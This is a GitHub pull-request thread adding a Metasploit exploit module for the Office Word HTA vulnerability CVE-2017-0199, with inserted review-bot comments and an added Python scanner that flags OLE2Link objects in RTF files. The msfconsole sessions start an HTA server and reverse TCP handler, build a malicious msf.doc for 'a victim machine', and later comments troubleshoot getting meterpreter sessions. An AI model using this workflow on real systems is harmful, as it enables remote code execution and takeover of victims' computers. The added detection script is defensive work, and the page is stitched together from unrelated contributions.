CVE-2017-0199 - Office Word HTA Module #8254

Merged
merged 8 commits into from Apr 24, 2017

8 participants
@nixawk
Contributor

nixawk commented Apr 17, 2017

@wvu-r7 @wchen-r7 @busterb Please check it. The details about the module are here: #8220.

msf > use exploit/windows/misc/hta_server
msf exploit(hta_server) > show options

Module options (exploit/windows/misc/hta_server):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Powershell x86


msf exploit(hta_server) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 10.97.100.101:4444
[*] Using URL: http://0.0.0.0:8080/ETTtwiMhS.hta
[*] Local IP: http://10.00.100.101:8080/ETTtwiMhS.hta
[*] Server started.
msf exploit(hta_server) > use exploit/windows/fileformat/office_word_hta
msf exploit(office_word_hta) > show options

Module options (exploit/windows/fileformat/office_word_hta):

   Name       Current Setting              Required  Description
   ----       ---------------              --------  -----------
   FILENAME                                no        The file name.
   TARGETURI  http://example.com/test.rtf  yes       The path to a online hta file.


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Office Word


msf exploit(office_word_hta) > set TARGETURI http://10.97.100.101:8080/ETTtwiMhS.hta
TARGETURI => http://10.00.100.101:8080/ETTtwiMhS.hta
msf exploit(office_word_hta) > set FILENAME msf.doc
FILENAME => msf.doc
msf exploit(office_word_hta) > run

[+] msf.doc stored at /Users/securitytest/.msf4/local/msf.doc

Copy /Users/securitytest/.msf4/local/msf.doc onto a victim machine and open it with Microsoft Word...

@nixawk

Contributor

nixawk commented Apr 17, 2017

If hta_server is used, a black flash window will come up. A new PR is meant to fix the issue.

Another question:

  • Is it necessary to add an HTA server feature to the module? It can gain a session without exploit/windows/misc/hta_server.
@busterb

This needs some docs too, but looks good!

+ # require 'rex/ole'
+ # ole = Rex::OLE::Storage.new('cve-2017-0199.bin', Rex::OLE::STGM_READ)
+ # ministream = ole.instance_variable_get(:@ministream)
+ # ministream_data = ministream.instance_variable_get(:@data)
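Review bot: the four commented-out lines (`# require 'rex/ole'` through `# ministream_data = ministream.instance_variable_get(:@data)`) are dead code and should be dropped, or replaced by a one-line comment saying why Rex::OLE is not used in this module; as written they also reach into Rex::OLE::Storage private state via `instance_variable_get(:@ministream)` and `:@data`, which is not a supported interface and would break silently when the library's internals change.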

@busterb

busterb Apr 17, 2017

Contributor

We should take a look at what was broken in rex-ole, e.g. is it preventing us from parsing a corrupted document?

@nixawk

nixawk Apr 18, 2017

Contributor

The RTF may not be a corrupted document. Please check my steps.

  1. The original RTF was created by Office Word 2010 on Windows 7. I've tried to recreate a new one with the same issue.

  2. Show OLE Object info with oletools - rtfobj

$ rtfobj cve-2017-0199.rtf
rtfobj 0.50 - http://decalage.info/python/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues

===============================================================================
File: 'cve-2017-0199.rtf' - size: 37633 bytes
---+----------+-------------------------------+-------------------------------
id |index     |OLE Object                     |OLE Package
---+----------+-------------------------------+-------------------------------
0  |00002A2Ah |format_id: 2                   |Not an OLE Package
   |          |class name: 'OLE2Link'         |
   |          |data size: 2560                |
---+----------+-------------------------------+-------------------------------

  3. Dump the OLE object with rtfobj.

$ rtfobj -s 0 cve-2017-0199.rtf
rtfobj 0.50 - http://decalage.info/python/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues

===============================================================================
File: 'cve-2017-0199.rtf' - size: 37633 bytes
---+----------+-------------------------------+-------------------------------
id |index     |OLE Object                     |OLE Package
---+----------+-------------------------------+-------------------------------
0  |00002A2Ah |format_id: 2                   |Not an OLE Package
   |          |class name: 'OLE2Link'         |
   |          |data size: 2560                |
---+----------+-------------------------------+-------------------------------
Saving file embedded in OLE object #0:
  format_id  = 2
  class name = 'OLE2Link'
  data size  = 2560
  saving to file cve-2017-0199.rtf_object_00002A2A.bin

  4. When the RTF object is dumped successfully, parse the OLE object binary data with read_oleobject.rb.

$ ruby read_oleobject.rb cve-2017-0199.rtf_object_00002A2A.bin
4
- #<Dirent:"Root Entry">
  |- #<Dirent:"\u0001Ole" size=162 data="\x01\x00\x00\x02\t...">
  |- #<Dirent:"\u0003ObjInfo" size=6 data="\x10\x02\x03\x00\x04\x00">
  \- #<Dirent:"\u0003LinkInfo" size=102 data="\x1E\x00htt...">

From: /Users/Open-Security/Code/labs/CVE-2017-0199/read_oleobject.rb @ line 26 Object#read_ole_ministream:

    14: def read_ole_ministream(filename)
    15:   # ole/storage
    16:   ole = Ole::Storage.open(filename, 'rb+')
    17:   puts ole.dirents.length
    18:   puts ole.root.to_tree
    19:
    20:   # rex/ole
    21:   ole = Rex::OLE::Storage.new(filename, Rex::OLE::STGM_READ)
    22:   ministream = ole.instance_variable_get(:@ministream)
    23:   data = ministream.instance_variable_get(:@data)
    24:
    25:
 => 26:   binding.pry
    27:
    28:   olebin = ::File.open("#(unknown)-ministream_data.bin", 'wb+')
    29:   olebin.write(data)
    30:   olebin.close
    31: end

[1] pry(main)> data
=> "\x01\x00\x00\x02\t\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00V\x00\x00\x00\xE0\xC9\xEAy\xF9\xBA\xCE\x11\x8C\x82\x00\xAA\x00K\xA9\v>\x00\x00\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00w\x00w\x00w\x00.\x00b\x00a\x00i\x00d\x00u\x00.\x00c\x00o\x00m\x00/\x00i\x00n\x00d\x00e\x00x\x00.\x00h\x00t\x00m\x00\x00\x00\xFF\xFF\xFF\xFF i3%\xF9\x03\xCF\x11\x8F\xD0\x00\xAA\x00ho\x13\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00 \xED\xE0P\x9D\xB8\xD2\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xB1\x00\x05\x00\x10\x00\b\x01\x10\x02\x03\x00\x04\x00\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xAC\x00\x05\x00\x1F\x00\b\x01\xC0\x81\xA7\bx\x01\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1E\x00http://www.baidu.com/index.htm\x00\x00\xBB\xBB\xCC\xCC\x1E\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00w\x00w\x00w\x00.\x00b\x00a\x00i\x00d\x00u\x00.\x00c\x00o\x00m\x00/\x00i\x00n\x00d\x00e\x00x\x00.\x00h\x00t\x00m\x00\x00\x00\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
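The steps above go from the RTF, to the embedded object that rtfobj reports as class 'OLE2Link', to the "\u0001Ole" stream whose bytes carry a URL moniker followed by a UTF-16LE URL. The script below is an added example written for this page; it is not part of this PR, of Metasploit, or of oletools. It does the defender's version of the same walk: find every \objdata hex run in an RTF, parse the OLE 1.0 object header (the fields rtfobj prints as format_id, class name and data size), and pull any URL moniker target out of the native data so that an OLE2Link object pointing at a remote URL can be flagged. It assumes the standard OLE 1.0 header layout and the URL moniker CLSID; it does not parse the compound file inside the native data, it simply searches it. The sample RTF is constructed for the test (its native data is a bare moniker record, not a real compound file, and http://example.com/test.hta is a placeholder); the second input, PR_OLE_STREAM_PREFIX, is the start of the "\u0001Ole" stream copied from the pry dump above.

```python
import re
import struct

# URL moniker CLSID {79EAC9E0-BAF9-11CE-8C82-00AA004BA90B} in on-disk byte order: the
# 16-byte run that sits just before the UTF-16LE URL in the pry dump above.
URL_MONIKER_CLSID = bytes.fromhex("E0C9EA79F9BACE118C8200AA004BA90B")

# Start of the "\u0001Ole" stream, copied from the pry dump in this thread.
PR_OLE_STREAM_PREFIX = (
    b"\x01\x00\x00\x02\t\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    b"\x00\x00\x00\x00V\x00\x00\x00\xE0\xC9\xEAy\xF9\xBA\xCE\x11\x8C\x82\x00\xAA\x00K\xA9\v"
    b">\x00\x00\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00w\x00w\x00w\x00.\x00b\x00a\x00i\x00"
    b"d\x00u\x00.\x00c\x00o\x00m\x00/\x00i\x00n\x00d\x00e\x00x\x00.\x00h\x00t\x00m\x00\x00\x00"
)

# Hex run following an RTF \objdata control word (Word wraps it across many lines).
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9A-Fa-f\s]+)")


def decode_objdata(hex_run: bytes) -> bytes:
    """Strip whitespace from a \\objdata hex run and decode it to raw bytes."""
    cleaned = re.sub(rb"\s+", b"", hex_run)
    return bytes.fromhex(cleaned[: len(cleaned) & ~1].decode("ascii"))  # drop odd nibble


def parse_ole1_header(blob: bytes):
    """Parse the OLE 1.0 ObjectHeader at the start of \\objdata.

    Layout: OLEVersion(4) FormatID(4) ClassName TopicName ItemName NativeDataSize(4)
    NativeData; the names are u32-length-prefixed ANSI strings. rtfobj's format_id,
    class name and data size come from these fields. Returns
    (format_id, class_name, native_data), or None when the header is truncated."""
    pos = 0

    def u32():
        nonlocal pos
        if pos + 4 > len(blob):
            raise ValueError("truncated OLE1 header")
        (val,) = struct.unpack_from("<I", blob, pos)
        pos += 4
        return val

    def lp_string():
        nonlocal pos
        n = u32()
        s = blob[pos:pos + n]
        pos += n
        return s.rstrip(b"\x00").decode("latin-1")

    try:
        u32()                      # OLEVersion
        format_id = u32()
        class_name = lp_string()
        lp_string()                # TopicName (unused here)
        lp_string()                # ItemName (unused here)
        size = u32()
    except ValueError:
        return None
    return format_id, class_name, blob[pos:pos + size]


def extract_moniker_urls(data: bytes):
    """Return every URL moniker target in data: CLSID, u32 byte length, UTF-16LE URL."""
    urls, start = [], 0
    while True:
        i = data.find(URL_MONIKER_CLSID, start)
        if i < 0:
            return urls
        start = i + len(URL_MONIKER_CLSID)
        if start + 4 <= len(data):
            (n,) = struct.unpack_from("<I", data, start)
            url = data[start + 4:start + 4 + n].decode("utf-16-le", "replace").rstrip("\x00")
            if url:
                urls.append(url)


def scan_rtf(rtf: bytes):
    """One finding per \\objdata object; flags OLE2Link objects that carry a URL moniker."""
    findings = []
    for m in OBJDATA_RE.finditer(rtf):
        hdr = parse_ole1_header(decode_objdata(m.group(1)))
        format_id, class_name, native = hdr if hdr else (None, None, b"")
        urls = extract_moniker_urls(native)
        findings.append({"class_name": class_name, "format_id": format_id, "urls": urls,
                         "suspicious": class_name == "OLE2Link" and bool(urls)})
    return findings


def build_sample_rtf() -> bytes:
    """Constructed test input, not a real document: an OLE1 header of class OLE2Link whose
    native data is only a URL moniker record rather than a compound file."""
    lp = lambda s: struct.pack("<I", len(s)) + s          # length-prefixed ANSI string
    url = "http://example.com/test.hta".encode("utf-16-le") + b"\x00\x00"   # placeholder
    native = b"\x00" * 8 + URL_MONIKER_CLSID + struct.pack("<I", len(url)) + url
    ole1 = (struct.pack("<II", 0x00000501, 2) + lp(b"OLE2Link\x00") + lp(b"") + lp(b"")
            + struct.pack("<I", len(native)) + native)
    hexdata = ole1.hex().encode("ascii")
    wrapped = b"\n".join(hexdata[i:i + 64] for i in range(0, len(hexdata), 64))
    return (b"{\\rtf1\\ansi\n{\\object\\objautlink{\\*\\objclass OLE2Link}{\\*\\objdata\n"
            + wrapped + b"}}\n}")
```

Running scan_rtf over the constructed sample yields one finding with class_name 'OLE2Link', format_id 2, the placeholder URL and suspicious=True, and extract_moniker_urls on the copied stream prefix recovers the http://www.baidu.com/index.htm target from the dump. A truncated \objdata blob produces a finding with no class name and suspicious=False rather than an exception, which is the behaviour you want when the scanner runs over mail attachments in bulk. For a full parse of the native data (the compound file with its "\u0001Ole", "\u0003ObjInfo" and "\u0003LinkInfo" streams) use rtfobj/olefile as the thread does; this script only answers the triage question of whether an OLE2Link object in the file points at a remote URL.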
+
+ def create_rtf_format
+ template_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2017-0199.rtf")
+ template_rtf = ::File.open(template_path, 'rb')
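Review bot: `template_rtf = ::File.open(template_path, 'rb')` in create_rtf_format leaves a file handle open unless it is explicitly closed later in the method, which the hunk does not show; since the whole template is read into memory, `template_rtf = ::File.binread(template_path)` (or the block form `::File.open(template_path, 'rb') { |f| ... }`) releases the handle on every path, including when an exception is raised part-way through.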

@busterb

busterb Apr 17, 2017

Contributor

TODO - it would be nice if there was a wrapper to get a data directory file (not needed for this module)

@nixawk

Contributor

nixawk commented Apr 18, 2017

Thanks @busterb. I'll add the module doc later.

@jooeji

jooeji commented Apr 18, 2017

[screenshot: _20170418151013]
It takes so long.

@nixawk

Contributor

nixawk commented Apr 18, 2017

@jooeji Could you share the packet here? If you failed to exploit CVE-2017-0199, please try it with a clean IE cache.

Thanks @busterb. The module doc is added.

@wchen-r7 wchen-r7 self-assigned this Apr 18, 2017

@nixawk

Contributor

nixawk commented Apr 21, 2017

Any questions about the module?

@wchen-r7

Contributor

wchen-r7 commented Apr 21, 2017

I'll take over from here. I will be landing this soon. Sorry for the wait. And thanks!

@wchen-r7 wchen-r7 merged commit 0a085c4 into rapid7:master Apr 24, 2017

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed

wchen-r7 added a commit that referenced this pull request Apr 24, 2017

@wchen-r7

Contributor

wchen-r7 commented Apr 24, 2017

Release Notes

The exploit/windows/misc/hta_server module has been added to the framework. It exploits a Microsoft Office vulnerability that started off as an 0day being exploited in the wild. By using an OLE2 link object in a doc or RTF file, it is possible to abuse the HTA handler, which will allow the document to download a malicious HTA application and execute it.

@wchen-r7

Contributor

wchen-r7 commented Apr 24, 2017

Sorry for the slow response. I modified the exploit to run its own HTA server, and it allows the HTA window to be invisible. Also updated the doc a little.

@nixawk

Contributor

nixawk commented Apr 25, 2017

Thanks @wchen-r7 .

@C6h0st

C6h0st commented Apr 26, 2017

I have tried the old and new versions of this module, but it failed on Windows 7 with all Office versions (2007->2016); I also tried with both fresh and normal VMs. The process WINWORD.exe just downloads the .hta file but doesn't execute the payload. Does anybody have the same problem?

@nixawk

Contributor

nixawk commented Apr 26, 2017

Please read the module info and check your lab version. I've failed to exploit it on Windows 7, but it works on Windows 7 SP1.

Vulnerable OS list, ex:

Windows Vista Service Pack 2
Windows Vista x64 Edition Service Pack 2
Windows 7 for 32-bit Systems Service Pack 1
Windows 7 for x64-based Systems Service Pack 1
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for Itanium-Based Systems Service Pack 2
Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Microsoft Office 2007 Service Pack 3
Microsoft Office 2013 Service Pack 1 (32-bit editions)
Microsoft Office 2013 Service Pack 1 (64-bit editions)
Microsoft Office 2010 Service Pack 2 (32-bit editions)
Microsoft Office 2010 Service Pack 2 (64-bit editions)
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)
@kalifan

kalifan commented Apr 27, 2017

@nixawk Hi, I don't know why it does not work fine. I have Windows 7 SP1 running with Office 2016 Pro Plus 64-bit; could it be AV?

I have a screenshot to show you.

[screenshot: hta]

@C6h0st

C6h0st commented Apr 27, 2017

I have the same problem as @kalifan on Windows 7 SP1 with Office 2013 SP1.

@kalifan

kalifan commented Apr 29, 2017

@C6h0st I tried the new exploit from exploit-db and it does not work fine either. :(
https://www.exploit-db.com/exploits/41934/
[screenshot: 2017-04-28_234017]

@digexploit

digexploit commented Apr 30, 2017

I have the same problem as jooeji; I cannot get a meterpreter back.

@nixawk

Contributor

nixawk commented Jul 18, 2017

@kalifan

kalifan commented Jul 19, 2017

@nixawk Almost. We can keep trying, thanks bro.
